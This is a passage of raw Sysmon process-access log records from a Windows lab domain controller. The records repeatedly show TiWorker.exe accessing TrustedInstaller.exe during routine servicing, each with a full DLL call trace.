4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.070{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.055{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.055{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.055{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.055{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.055{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.039{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.039{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.039{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.039{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.039{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.023{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.023{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.023{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.023{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.008{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.008{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x800000000000000011506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:31.008{59A5CD1D-93F8-6005-EC04-00000000A301}24884992C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{59A5CD1D-93F8-6005-EB04-00000000A301}3664C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.